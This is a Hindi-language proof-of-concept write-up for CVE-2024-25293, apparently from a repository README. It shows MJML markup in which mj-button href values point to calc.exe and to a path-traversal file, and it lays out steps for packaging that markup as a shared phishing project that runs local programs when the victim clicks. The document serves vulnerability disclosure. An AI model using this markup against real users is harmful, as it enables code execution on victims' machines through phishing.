
mjml-app v3.0.4 और 3.1.0-beta RCE एक्सप्लॉइट
CVE-2024-25293 भेद्यता के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट।
mjml-app v3.0.4 और 3.1.0-beta में रिमोट कोड एक्ज़िक्यूशन (RCE) पाया गया।
इस रिपॉजिटरी में एक उदाहरण भेद्य एप्लिकेशन और उसका प्रूफ-ऑफ-कॉन्सेप्ट (POC) शोषण मौजूद है।

चरण 1) हमलावर एक 'href' टैग के साथ एक 'mj-button' बनाता है और
<mjml>
<mj-body>
<mj-section>
<mj-column>
<mj-button background-color="#f45e43" color="white" href="C:\Users\EQST\Desktop\jruru\..\jruru_hacked.txt"> jruru </mj-button>
<mj-button background-color="#f45e43" color="white" href="C:Windows/System32/calc.exe"> Code Execution </mj-button>
</mj-column>
</mj-section>
</mj-body>
</mjml>

चरण 2) हमलावर निम्नलिखित कोड के साथ मुख्य फ़िशिंग प्रोजेक्ट बनाता है।
<!-- header.mjml -->
<mj-section>
<mj-column>
<mj-text>This is a demo jruru</mj-text>
</mj-column>
</mj-section>
<!-- main.mjml -->
<mj-include path="./index.mjml" />

चरण 3) पीड़ित साझा प्रोजेक्ट खोलता है और बटन पर क्लिक करता है, जिससे पेलोड का निष्पादन ट्रिगर होता है (जैसे calc, notepad)

किसी एप्लिकेशन के भीतर href टैग के माध्यम से exe फ़ाइलें चलाना जोखिम भरा है, और Path Traversal के साथ संयोजन में फ़ाइलें चलाना एक सुरक्षा चिंता है। यह फ़िशिंग प्रोजेक्ट बनाने और उन्हें तैनात करने की अनुमति देता है ताकि लोकल फ़ाइलें निष्पादित की जा सकें। इसलिए, ऐसे निष्पादन को रोकने के लिए इस सुविधा को संशोधित करना आवश्यक है।